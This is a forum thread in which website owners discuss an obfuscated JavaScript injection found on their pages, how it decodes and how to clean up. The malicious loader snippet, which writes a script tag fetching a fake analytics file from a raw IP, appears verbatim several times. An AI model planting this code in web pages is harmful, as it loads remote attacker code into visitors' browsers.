Please help I have found a mysterious code on a lot of my websites? Is this a hack?

I recently checked some of my sites and found that some text in the index files had been deleted. At the bottom of the pages I found this code..

<script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script>

Does anyone know what this is?

I have deleted the code from all the pages I could find.

Please help.

Thank you.

 

as far as i understand what it dows is just printing "=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?" on your webpage.....

thats all.....

cheers

 

that code insert this javascript:
http://84.244.138.55/google-analytics/ga.js (not the real google analytics)

then this new code insert this page (http://84.244.138.55/ts/in.cgi?sliframe) on a hidden iframe on your page

i dont know what that page do, it set some cookies then redirect you to www.cmyip.com

 

may i know how u found it out??? that it calls this JS???? how did u decode those characters??

cheers

 

add/change a few things and you get this:

[B]javascript:[/B]var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);[B]alert[/B](result);

Code (markup):

copy and paste on your address bar and hit enter, you get the decoded text

 

any ways.... how can other people add this code into this persons web pages???

hey is your web page a comments page??

cheers

 

My hosting company says that the only way this code could have been placed on my sites is if the hacker had my ftp passwords. I have found this code now on 30 of my sites, so it seems that the hacker had access to my hosting account as all my passwords are different for each ftp account.

I have no idea how the hacker got access to my hosting account, I use only one computer and no one else has access to it. No one knows any of my passwords and I dont have them written down. Basically no one has access to any of my passwords unless they can read my mind!

There only thing I can think of is spyware or a virus infected my browser and traced my passwords without me knowing a thing about it!

Anyway, my hosting company did a trace on the ftp login and came up with this ip address

209.124.81.18

This is the address of an ftp login on my websites, it belongs to USA and is hosted my Dragon Networks, Inc. I have contacted dragon without any reply from them so I will now publish this ip address all over the net. I would advise anyone to create a htaccess file and block the whole ip range from dragon because I am not sure if this hacker has access to more than 1 ip address with dragon.

ip range

209.124.64.0 - 209.124.95.255

I have been through quite a bad time here with this hack, not knowing how far they went or what else they have access to. I have had to not only change all my ftp passwords on all of my sites but also change my Facebook, Hotmail, Bank etc etc login details. I have had to search almost every file on my sites to delete that code manually. Some of my sites I have had to rebuild the index pages because some info was deleted.

In future I am going to be checking my sites a lot more.

I am tired now and hope this doesnt happen to anyone else, although chances are it could be you next!

 

Does your host support FTPS encryption for secure FTP connections?

Consider running Malwarebytes Anti-Malware on the systems you use to modify your site. You might have a trojan installed.

Check also if your server manager regularly scans the server(s) for rootkits/backdoors/trojans.

 

Is there anyway of taking legal action online? I just found that this person has definatly got it in for me. I thought it was a random attack, but I have now found the sites attacked are my busiest and more files with the code on have appeared. This is taking me a long time to clear up, but I am getting there.

Thank you for your help and support.

 

is Safe_Mode enabled in your PHP configuration ?

Carl

 

Hi Canary we have recently had the same problem, did you come to any conclusions on finding the source of the problem?

 

i have similar problem, i accidentally leave my file on CH777 for two hour (after edit forget to change) and the stupid file all over the folder ...

 

Who are you using for your host?

I had to download all my websites, use simple search and replace software to find the infected files, delete them and upload them. I also changed all my ftp passwords and main server password. I don't think it had anything to do with chmod 777 as the files infected where chmod 644. Also nothing to do with php scripting as some files on my websites didn't contain php scripts, they were basic frontpage index files. I am more concerned about my hosting as I reckon it is a server hack. Please let me know who you are hosted with, if it matches my host I will forward this thread to them.

Thank you.

 

I'm having the same issue mentioned above here I get that snippet of code on my rendered page at the very top of the page when you view source. I've done a search through all the files for that exact code but nothing comes up. Does the actual code that generates that snippet look differently than the code that is rendered on the page? This is driving me nuts, any help is appreciated! The site is my wifes wedding blog: www.vintageglamblog.com

matt

OFFENDING CODE ON RENDERED PAGE ABOVE DOC TYPE:

<script>var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);document.write(result); </script>

 

I have just found this code on my website too, and I found this thread by Googling the offending code. According to the last modification date the code was inserted on 24 March 2009.

My web host is .Com Web Hosting and they are a reseller for Heart Internet. I have opened a support ticket and I am waiting a reply. Who is your web host, canaryspace?

 

If you haven't already, change your account access passwords. Including those passwords for FTP, e-mail, and SSH access. Also, scan your computer(s) for trojans and spyware that may have allowed the attacker to discover your passwords.

Many people have good results with Malwarebytes' Anti-Malware

 

I am a reseller for Heartinternet! Anyone else?????

 

CanarySpace - I've had the same problem, got an email from Google and all. And yes I'm a Heart Internet reseller (ironically I am in the process of moving o Hostgator to save money - this incident may speed things up!!)

 

I can't say for sure but I would take an educated guess and say it's poor server side settings.

If someone had access to all your web logins they'd probably do more than spam your sites with broken code, one by one.

Theres a lot of ways this might/could happen, but if I were you I'd move hosts and run a virus checker (Kaspersky is best IMO 30 day trial too)

 

Can you run Kaspersky on a shared host or is this a solution that you can only implement if you have a dedicated server? Thank you for your time.